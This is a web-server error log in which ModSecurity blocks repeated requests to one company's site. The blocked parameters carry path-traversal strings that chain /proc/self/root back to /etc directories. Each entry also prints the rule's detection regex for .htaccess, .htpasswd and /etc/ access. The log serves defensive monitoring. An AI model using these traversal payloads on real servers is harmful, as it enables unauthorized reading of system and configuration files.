[Fri Mar 20 06:50:20.563770 2026] [:error] [pid 11642:tid 140411725141760] [client 74.7.243.128:44470] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0YW7ninkcc-iUj5ApP-gAAA4I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:50:58.903262 2026] [:error] [pid 31215:tid 140411649607424] [client 74.7.243.128:39446] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0YggF0L0L-SsrnPo5aAwAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:51:00.334726 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.243.128:41980] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0YhOoXxyEfFpUF8f9zhAAAAUI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:51:01.628423 2026] [:error] [pid 9818:tid 140411666392832] [client 74.7.243.128:41994] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0YhV1pVZ5mVmJwsFMg-wAAAEk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:51:03.044560 2026] [:error] [pid 11642:tid 140411691570944] [client 74.7.243.128:42006] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Yh7ninkcc-iUj5ApQDQAAA4Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:51:04.334732 2026] [:error] [pid 7235:tid 140411599251200] [client 74.7.243.128:42010] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0YiPqxLDW4GITHUkTWtgAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:51:14.896940 2026] [:error] [pid 9818:tid 140411716749056] [client 74.7.243.128:42026] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Ykl1pVZ5mVmJwsFMhCwAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:51:21.657512 2026] [:error] [pid 9818:tid 140411607643904] [client 74.7.243.128:38846] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0YmV1pVZ5mVmJwsFMhFAAAAFA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:51:24.030684 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.243.128:56332] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0YnOoXxyEfFpUF8f9zkgAAAVY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:51:37.731359 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.243.128:56348] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0YqeoXxyEfFpUF8f9zqAAAAU4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:51:46.789579 2026] [:error] [pid 21219:tid 140411632822016] [client 74.7.243.128:38522] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0YsfXLqtnMIWvjpaKMNQAAAo0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:52:14.126693 2026] [:error] [pid 31215:tid 140411666392832] [client 74.7.243.128:51318] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0YzgF0L0L-SsrnPo5aOQAAAsk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:52:17.977506 2026] [:error] [pid 7893:tid 140411716749056] [client 74.7.243.128:51322] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Y0RCii7xarUs8iHZZlQAAAgM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:52:19.447120 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.243.128:48618] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Y0-oXxyEfFpUF8f9zuQAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:52:23.359197 2026] [:error] [pid 10189:tid 140411708356352] [client 74.7.243.128:48630] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Y1zJ3M9BSuKP7CAYKxgAAAIQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:52:24.807073 2026] [:error] [pid 7893:tid 140411691570944] [client 74.7.243.128:48638] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Y2BCii7xarUs8iHZZlwAAAgY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:52:28.695292 2026] [:error] [pid 21219:tid 140411666392832] [client 74.7.243.128:48644] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Y3PXLqtnMIWvjpaKMTwAAAok"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:52:43.581614 2026] [:error] [pid 9818:tid 140411574073088] [client 74.7.243.128:51916] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Y611pVZ5mVmJwsFMhSQAAAFQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:53:00.268824 2026] [:error] [pid 15826:tid 140411733534464] [client 57.141.18.105:40896] [client 57.141.18.105] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0Y_OoXxyEfFpUF8f9z1gAAAUE"]
[Fri Mar 20 06:53:02.020178 2026] [:error] [pid 11167:tid 140411716749056] [client 57.141.18.78:40950] [client 57.141.18.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0Y_vHIg5MgXLBnicPq9gAAAcM"]
[Fri Mar 20 06:53:03.876214 2026] [:error] [pid 21219:tid 140411557287680] [client 57.141.18.77:41006] [client 57.141.18.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0Y__XLqtnMIWvjpaKMaQAAApY"]
[Fri Mar 20 06:53:04.115619 2026] [:error] [pid 9818:tid 140411582465792] [client 57.141.18.111:41012] [client 57.141.18.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/man_db.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZAF1pVZ5mVmJwsFMhWQAAAFM"]
[Fri Mar 20 06:53:05.816467 2026] [:error] [pid 21219:tid 140411548894976] [client 57.141.18.107:41042] [client 57.141.18.107] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZAfXLqtnMIWvjpaKMagAAApc"]
